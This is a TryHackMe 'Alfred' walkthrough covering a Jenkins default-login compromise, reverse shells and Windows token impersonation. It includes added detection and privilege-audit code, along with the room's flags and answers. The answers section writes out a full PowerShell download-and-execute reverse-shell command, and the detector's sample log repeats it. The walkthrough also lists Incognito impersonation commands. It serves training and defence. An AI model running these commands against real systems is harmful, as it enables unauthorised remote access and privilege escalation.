This article is a walkthrough of the “Alfred” machine on TryHackMe, part of the Offensive Security pathway. The presenter demonstrates how to exploit the machine and perform privilege escalation using various techniques.

Overview of Alfred Machine

Tools Used: Exploitation involved tools like Netcat, Metasploit, PowerShell, and MSFVenom.

Machine Setup: Alfred has 3 main open ports: 80, 389, and 8080.

Port 80: Basic web page.

Port 8080: Admin panel for a Jenkins server.

Initial Exploitation

Accessing Jenkins

  • Jenkins is a software development and automation tool often used for continuous integration.
  • The admin panel was accessed using default credentials (admin:admin), a common vulnerability.

Reverse Shell Creation

  • Once logged into Jenkins:
    • Exploited its ability to run shell commands.
    • Used various techniques to establish a reverse shell:
      1. Netcat Reverse Shell: Uploaded a Netcat binary to the target using Jenkins commands.
      2. PowerShell Reverse Shell: Used a custom script to gain access.
      3. MSFVenom Payload: Generated a payload using Metasploit to obtain a Meterpreter session.
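As an added detection example (not code from the room or the video), assuming process-creation telemetry exported as JSON lines with Sysmon-style ParentImage, Image and CommandLine fields: a Python scanner that flags Jenkins' java.exe spawning a shell whose command line carries the download-cradle and Invoke-PowerShellTcp indicators used in this walkthrough. The sample events are constructed.

```python
import json
import re
CRADLE_PATTERNS = [  # pieces of the PowerShell download cradle from the walkthrough
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
]
REVERSE_PATTERN = re.compile(r"-reverse\b|invoke-powershelltcp", re.I)
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "pwsh.exe")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the indicators matched by one process-creation event."""
    reasons, parent, cmd = [], ev.get("ParentImage", ""), ev.get("CommandLine", "")
    if (basename(parent) == "java.exe" and "jenkins" in parent.lower()
            and basename(ev.get("Image", "")) in SHELL_IMAGES):
        reasons.append("jenkins-spawned-shell")
    if sum(1 for p in CRADLE_PATTERNS if p.search(cmd)) >= 2:
        reasons.append("powershell-download-cradle")
    if REVERSE_PATTERN.search(cmd):
        reasons.append("reverse-shell-invocation")
    return reasons

def severity(reasons):
    # A shell spawned by Jenkins alone is ordinary build activity (low); with
    # cradle or reverse-shell indicators it is high; a cradle elsewhere is medium.
    if not reasons:
        return None
    if "jenkins-spawned-shell" in reasons:
        return "high" if len(reasons) > 1 else "low"
    return "medium"

def scan(lines):
    """Scan JSON-per-line process events; return (pid, severity, reasons) hits."""
    alerts = []
    for line in filter(None, (ln.strip() for ln in lines)):
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append((ev.get("ProcessId"), severity(reasons), reasons))
    return alerts

# Constructed sample events (Sysmon-style fields exported as JSON lines).
SAMPLE_LOG = r"""
{"ProcessId": 4120, "ParentImage": "C:\\Program Files (x86)\\Jenkins\\jre\\bin\\java.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444"}
{"ProcessId": 4188, "ParentImage": "C:\\Program Files (x86)\\Jenkins\\jre\\bin\\java.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir C:\\builds"}
{"ProcessId": 5002, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
"""
```

Running scan(SAMPLE_LOG.splitlines()) reports the first event as high and the second (a plain build step) as low context only.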

Windows Privilege Escalation

Windows Token Impersonation

  • Impersonation is the key to escalating privileges in Windows systems.
  • Checked user privileges:
    • Found impersonation privilege and delegation privilege, enabling token impersonation.
  • Used Metasploit’s Incognito module:
    • Listed available tokens.
    • Impersonated the administrator token to gain full system access.

Manual Method

  • As an alternative, downloaded a tool to manually list and impersonate tokens, which could be done without Metasploit.
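The privilege check above corresponds to the Windows privilege names SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege. As an added audit example that is not part of the walkthrough, this Python code parses `whoami /priv` output (a constructed sample is embedded) and flags those privileges regardless of their Enabled/Disabled state.

```python
import re

# Privileges that let a process impersonate or assign another user's token;
# token-impersonation tooling (Incognito and manual equivalents) depends on them.
TOKEN_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")

def parse_whoami_priv(text):
    """Parse the table printed by `whoami /priv` into {privilege: state}."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def audit(text):
    """Flag token-impersonation privileges held by the account.

    The State column only says whether the privilege is currently enabled in
    the token; a process holding a 'Disabled' privilege can enable it itself,
    so presence is what matters, not state."""
    privs = parse_whoami_priv(text)
    flagged = sorted(p for p in privs if p in TOKEN_PRIVILEGES)
    return {"privileges": privs, "flagged": flagged,
            "token_impersonation_possible": bool(flagged)}

# Constructed sample: the output shape of `whoami /priv` for a service account.
SAMPLE_WHOAMI = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
```

The mitigation this audit points at is running services such as Jenkins under an account that does not hold these privileges.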

Key Insights

  1. Default Credentials: Often overlooked, default credentials are still a major vulnerability.
  2. Privilege Escalation via Tokens: Windows token impersonation is a critical skill in pentesting.
  3. Redundancy in Exploitation: Demonstrating multiple ways (Netcat, PowerShell, Metasploit) ensures flexibility in real-world scenarios.

Interesting Facts

  • Jenkins is widely used in software development but is frequently misconfigured, making it a common target for attackers.
  • The impersonation privilege in Windows systems allows non-admin users to perform tasks as higher-privileged users if exploited.

TryHackMe Alfred | Room Answers

How many ports are open? (TCP only)

3

What is the username and password for the login panel? (in the format username:password)

admin:admin

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the PowerShell script and make it available for the server to download. You can do this by creating an HTTP server with Python: python3 -m http.server

No answer needed

What is the user.txt flag?

79007a09481963edf2e1321abd9ae2a0

What is the final size of the exe payload that you generated?

73802

To check which tokens are available, enter the list_tokens -g command. We can see that the BUILTIN\Administrators token is available.

Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators' token. What is the output when you run the getuid command?

NT AUTHORITY\SYSTEM

Read the root.txt file located at C:\Windows\System32\config

dff0f748678f280250f25a45b8046b4a

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.